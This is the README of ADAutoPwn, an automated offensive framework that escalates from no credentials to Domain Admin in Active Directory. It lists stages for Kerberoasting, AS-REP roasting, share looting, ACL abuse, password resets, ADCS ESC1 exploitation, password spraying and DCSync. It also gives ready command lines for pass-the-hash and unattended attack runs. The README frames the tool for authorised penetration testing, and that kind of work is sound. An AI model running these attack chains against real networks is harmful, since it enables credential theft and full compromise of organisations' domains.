█████╗ ██████╗ █████╗ ██╗ ██╗████████╗ ██████╗
██╔══██╗██╔══██╗ ██╔══██╗██║ ██║╚══██╔══╝██╔═══██╗
███████║██║ ██║ ███████║██║ ██║ ██║ ██║ ██║
██╔══██║██║ ██║ ██╔══██║██║ ██║ ██║ ██║ ██║
██║ ██║██████╔╝ ██║ ██║╚██████╔╝ ██║ ╚██████╔╝
╚═╝ ╚═╝╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═════╝
██████╗ ██╗ ██╗███╗ ██╗
██╔══██╗██║ ██║████╗ ██║ Active Directory
██████╔╝██║ █╗ ██║██╔██╗ ██║ Automated Pwnage
██╔═══╝ ██║███╗██║██║╚██╗██║ Framework
██║ ╚███╔███╔╝██║ ╚████║
╚═╝ ╚══╝╚══╝ ╚═╝ ╚═══╝
From zero to Domain Admin — fully automated.
A single-command Active Directory assessment engine that chains the best of the
offensive toolchain (netexec, impacket, certipy, bloodyAD, kerbrute,
bloodhound-python…) into one coherent, recursive, colorful workflow.
Crafted & weaponized by c4sh3r · authorized engagements only
Most AD engagements start the same way: scan, fingerprint the DC, fix /etc/hosts,
sync the clock, hunt users, roast tickets, enumerate, look for ACL paths, check
ADCS, dump hashes. ADAutoPwn does all of it for you — and then keeps going.
Its core idea is a recursive pivot loop: the moment it recovers a new identity (a cracked hash, a LAPS/gMSA secret, a password it reset via an abused ACL), that identity is fed straight back into the engine and the entire enumeration + exploitation chain runs again as that user — until nothing new appears.
Every user, hash, ticket and finding is printed live and saved to disk.
⚠️ Legal: Use only against systems you are explicitly authorized to test — a signed engagement, your own lab, or a CTF you're entitled to play. You are responsible for your actions.
| Stage | What happens |
|---|---|
| 0 · Discovery | nmap of key AD ports → capability matrix (Kerberos/SMB/LDAP/RPC/WinRM). Domain/FQDN via SMB or LDAP rootDSE + LDAPS cert (works on Kerberos-only DCs) |
| 1 · Host & Time | Auto-append to /etc/hosts (idempotent) + clock sync with the DC (Kerberos prerequisite) |
| 2 · Unauth enum | null/guest sessions, anonymous shares, RID brute, rpcclient, LDAP anon bind, enum4linux-ng, kerbrute userenum |
| 3 · AS-REP + Timeroast | GetNPUsers + MS-SNTP Timeroast — captured hashes are cracked and fed back into the pivot queue |
| 4 · Validate + TGT | TGT-first (getTGT -dc-ip, DNS-independent) → proves creds, cached & reused everywhere via -k --use-kcache |
| 5 · Auth enum | users, groups, password policy, descriptions, shares, MachineAccountQuota (LDAP, or rpcclient fallback when LDAP is closed) |
| ★ Username variants | ryan.naylor → rnaylor, r.naylor, naylor… validated with kerbrute (no lockout) |
| ★ Share looting | spider readable shares, download files, crack password-protected Office/zip/pdf/keepass, decrypt & read their contents, harvest passwords inside |
| ★ Secrets | Passwords in descriptions/files, GPP, LAPS, gMSA/dMSA, DPAPI, pre-created computer passwords → auto-pivot on everything recovered |
| ★ WinRM + privesc | who can WinRM; whoami /priv + /groups → maps SeImpersonate→Potato, SeBackup/SeDebug/SeRestore, Backup Operators, DnsAdmins… |
| ★ ACL/delegation abuse | GenericAll, WriteDACL, ForceChangePassword, AddSelf, WriteOwner, WriteSPN, constrained delegation — with --abuse it performs the chain: group add/reset, WriteSPN→Kerberoast, Shadow Credentials, RBCD, S4U-to-Administrator, and DCSync |
| ★ Relay & coercion | SMB/LDAP signing checks, coerce_plus (PetitPotam/PrinterBug/DFSCoerce), spooler, WebDAV → relay playbook with your IP |
| ★ Trusts | domain & cross-forest trusts, foreign security principals, cross-forest Kerberoast |
| 6 · Kerberoast | GetUserSPNs for SPN accounts (incl. cross-forest) |
| 7 · ADCS | certipy scan for ESC1…ESC16, and with --abuse auto-exploit ESC1 (request a cert as Administrator → recover its hash/TGT → pivot) |
| 8 · BloodHound | full All collection → importable .zip + a self-contained interactive graph.html (offline, with built-in Linux/Windows abuse commands per edge) |
| 9 · DCSync | secretsdump -just-dc when privileges allow → entire domain's NTLM hashes |
| ★ NTDS offline | if NTDS.dit + SYSTEM are looted from shares → secretsdump -ntds LOCAL |
| ★ Report | a consolidated, human-readable report.md + tidy loot dir (enum/ · secrets/ · raw/) |
| ∞ · Pivot + spray | every recovered identity/secret re-enters the engine; recovered passwords are sprayed across all users to find more |
Plus:
- 🕸️ Interactive attack graph — a single self-contained
graph.html(no server, no internet, no BloodHound install). It opens focused on the attack paths to Domain Admins / DC from what you own, and click any node to get the exact Linux and Windows abuse commands for each ACL edge (GenericAll, WriteDacl, Shadow Credentials, RBCD, DCSync…). Auto-opens after a run; search/expand the rest. Use it standalone on any BloodHound zip:adautopwn --graph data.zip. - 🔐 Kerberos-first by default — works even when NTLM is disabled, and is quieter.
--ntlmto force NTLM. - 🧠 Domain-focused wordlist auto-generated from the target (
Season+Year,Name+123!, …) and tried first for offline cracking; optional capped online spray with--spray. - ♻️ Self-feed / resume — got creds or users by hand? Pass them with
--creds-file/--users-file(or reuse the same-oloot dir) and the engine continues from there. - 🩹 Crack by default — captured AS-REP / Kerberoast / NTLM hashes are cracked automatically (
--no-crackto disable); cracked creds re-pivot. - 🥷
--stealth— skips noisy techniques and adds jitter between actions. - 🧹 Responsible cleanup — every change the tool makes (group adds, password
resets, owner/SPN edits,
/etc/hosts) is tracked inrollback.logand revertible with--cleanup. No event-log wiping / anti-forensics — by design. - 🎨 Modern, colorful, real-time output (every user, hash and step printed live). Plain-text log saved alongside.
git clone https://github.com/c4sh3r/ADAutoPwn.git
cd ADAutoPwn
chmod +x install.sh adautopwn.sh
./install.sh # installs the whole toolchain (apt + pipx + kerbrute + rockyou)On Kali/Parrot most dependencies are already present; install.sh fills the gaps.
Python tools are listed in
requirements.txtand installed in isolation viapipx(with apip --userfallback).kerbruteis fetched as a Go binary into/opt/kerbrute.
ln -sf "$PWD/adautopwn.sh" ~/.local/bin/adautopwn # ~/.local/bin is on PATH
# now just: adautopwn -t <DC_IP> ...(install.sh also creates a /usr/local/bin/adautopwn symlink when it can.)
System (apt): nmap · smbclient · smbmap · rpcclient · ldap-utils ·
ntpdate · enum4linux-ng · john · hashcat · seclists
Python (pipx/pip): netexec · impacket · certipy-ad · bloodhound ·
bloodyAD · ldapdomaindump
Standalone: kerbrute → /opt/kerbrute (override with KERBRUTE_BIN=...)
sudo is requested once, for clock sync and the /etc/hosts entry.
adautopwn -t <DC_IP> [-d <domain>] [-u <user>] [-p <pass> | -H <nt_hash>] [options]
| Flag | Description |
|---|---|
-t <ip> |
Domain Controller IP (required) |
-d <domain> |
Domain FQDN (auto-detected if omitted) |
-u <user> |
Domain username |
-p <pass> |
Cleartext password |
-H <hash> |
NT hash (pass-the-hash) |
-o <dir> |
Output/loot directory (reuse it to resume) |
-w <list> |
Cracking wordlist (default: rockyou) |
--sudo-pass <p> |
Sudo password for unattended /etc/hosts + time sync (or SUDO_PASS=…) |
--creds-file <f> |
Feed extra credentials to continue from (user:password / user:nthash) |
--users-file <f> |
Merge an external username list (spray / AS-REP / variants) |
--no-crack |
Disable hash cracking (cracking is ON by default) |
--spray |
Also spray the domain-focused wordlist online |
--abuse |
Actively exploit ACLs (group adds, password resets, WriteSPN roast) — tracked for rollback |
--auto-pwn |
Convenience alias for --abuse --spray -y; --abuse remains the main exploitation switch |
--cleanup |
Revert every tracked change and exit |
--stealth |
OPSEC mode: skip noisy techniques + jitter |
--ntlm |
Force NTLM (default is Kerberos-first) |
--no-bh |
Skip BloodHound collection |
--no-open |
Don't auto-open graph.html in a browser |
--graph <zip> |
Standalone: render a BloodHound zip → graph.html and open it (no scan) |
--owned <file> |
Mark these principals (one per line) as compromised in the graph |
-y, --yes |
Assume yes — fully unattended |
--no-color |
Disable colors |
-h, --help |
Help |
Only
-tis required. With no credentials it runs every unauthenticated phase; add-u/-p(or-H) and it unlocks the rest and pivots recursively. The only opt-in (loud/destructive) extras are--abuseand--spray.
# Zero-credential recon (users, AS-REP, anon shares, trusts)
adautopwn -t 10.10.10.10
# Full authenticated, auto-cracking, unattended (Kerberos by default)
adautopwn -t 10.10.10.10 -d corp.local -u jdoe -p 'P@ssw0rd' --crack -y
# Go loud: also abuse ACLs (add to groups / reset passwords) with rollback
adautopwn -t 10.10.10.10 -d corp.local -u jdoe -p 'P@ssw0rd' --crack --abuse
# Pass-the-hash straight through to DCSync
adautopwn -t 10.10.10.10 -d corp.local -u admin -H 31d6cfe0d16ae931b73c59d7e0c089c0
# Quiet engagement
adautopwn -t 10.10.10.10 -d corp.local -u jdoe -p 'P@ssw0rd' --stealth
# Clean up after yourself
adautopwn -t 10.10.10.10 --cleanup -o loot_corp.local_20260607_2210
# Just visualize an existing BloodHound zip — no scan, no creds
adautopwn --graph ~/Downloads/20260608_bloodhound.zip
adautopwn --graph data.zip --owned owned_users.txt # flag what you already controlGot a credential or a list of users by other means? Hand them over and the
engine continues from there (reusing the same -o keeps all prior loot):
# Continue an engagement with creds you found manually
printf 'svc_sql:Summer2025!\nbackupadmin:31d6cfe0d16ae931b73c59d7e0c089c0\n' > creds.txt
adautopwn -t 10.10.10.10 -d corp.local --creds-file creds.txt -o loot_corp.local_20260607_2210
# Seed a custom user list (for spray / AS-REP / variant generation)
adautopwn -t 10.10.10.10 -d corp.local -u jdoe -p 'P@ss' --users-file users.txtEverything is printed live and written to a timestamped loot directory. At the end the dir is tidied: trophies + resume-critical files stay on top, everything else is grouped into subfolders and empty files are pruned.
loot_<domain>_<date>/
├── report.md # ⭐ consolidated, human-readable engagement report
├── graph.html # ⭐ interactive offline attack graph (auto-opens)
├── adautopwn.log # full plain-text transcript
├── users_all.txt # consolidated, de-duplicated user list
├── found_passwords.txt # every recovered password (sprayed + resumed)
├── credential_map.txt # what we recovered & where it came from
├── asrep_hashes.txt # AS-REP roast (hashcat -m 18200)
├── kerberoast_hashes.txt # Kerberoast (hashcat -m 13100)
├── secretsdump.txt # DCSync dump
├── cracked_passwords.txt # cracked hashes → plaintext
├── *.ccache # reusable Kerberos tickets
├── rollback.log # undo actions for --cleanup
├── enum/ # users/groups, password policy, nmap, domain wordlist
├── secrets/ # LAPS · gMSA · GPP · DPAPI · ACL dumps · trusts · ADCS · coercion
├── shares/ # files looted from readable shares
├── bloodhound/*.zip # BloodHound collection
└── raw/ # misc intermediates (cracked docs, file hashes…)
ADAutoPwn is built for professional engagements, so it cleans up after itself:
- Every mutation (group membership added, password reset, owner changed,
/etc/hostsentry) is recorded as an undo command inrollback.log. --cleanupreads that file and reverts the environment.
What it deliberately does not do: clear Windows event logs or perform
anti-forensics. That breaks the client's evidence chain and is out of scope for
legitimate testing. Stealth here means being quiet (--stealth, Kerberos,
jitter), not destroying evidence.
ADAutoPwn is free and source-available (noncommercial), built and maintained on a lot of late nights (testing against real labs, adding attack techniques, fixing edge cases). If it saved you time on an engagement or helped you learn, consider buying me a coffee — it directly fuels the next feature. 🙏
Contributions are very welcome — this is a community tool and the AD attack surface is huge. Whether you fix a parser edge-case or add a whole new technique, PRs and issues are appreciated.
# 1. Fork & clone
git clone https://github.com/<you>/ADAutoPwn.git && cd ADAutoPwn
# 2. Branch
git checkout -b feature/my-technique
# 3. Hack on adautopwn.sh — keep the house style:
# - one `phase_*` function per stage, wired into assess_current_credential()
# - gate techniques on the CAP_* capability flags
# - print findings with info/ok/warn/loot, save artifacts to $OUTDIR
# - anything that changes the target → rb_record for --cleanup
# - run `bash -n adautopwn.sh` (must stay clean) and test on a lab/HTB box
# 4. PR with a short description + sample outputPlease test against a lab or a box you're allowed to use, and never commit loot/credentials (the
.gitignorealready blocks the usual files).
- Parser hardening — make the bloodyAD / netexec output parsing more robust across versions (the ACL and trust parsers are the juiciest targets).
- More ADCS ESCs — extend the auto-exploit beyond ESC1 (ESC4/ESC8/ESC9…).
- Offline DPAPI — decrypt masterkey + credential blobs looted from shares.
- More document types — OneNote,
.kdb,.configconnection strings, etc. - Graph edges — add
AdminTo/CanRDP/session-based lateral edges and more abuse recipes to the graph's built-in command library. - WinRM post-ex — pull
cmdkey /list, scheduled tasks, saved creds when a shell is available. - Coercion-to-relay glue — optional
--relaythat launchesntlmrelayx- a coercion trigger end-to-end (opt-in).
Pick one, open an issue to claim it, and go 🚀
PolyForm Noncommercial 1.0.0 — see LICENSE. Free to use, modify
and share for noncommercial purposes (research, education, personal use,
nonprofits). Commercial use, selling or reselling is not permitted — all
commercial rights are reserved by the author (c4sh3r); contact for a
commercial license. Provided for authorized security testing only; the
author assumes no liability for misuse.
impacket flags by c4sh3r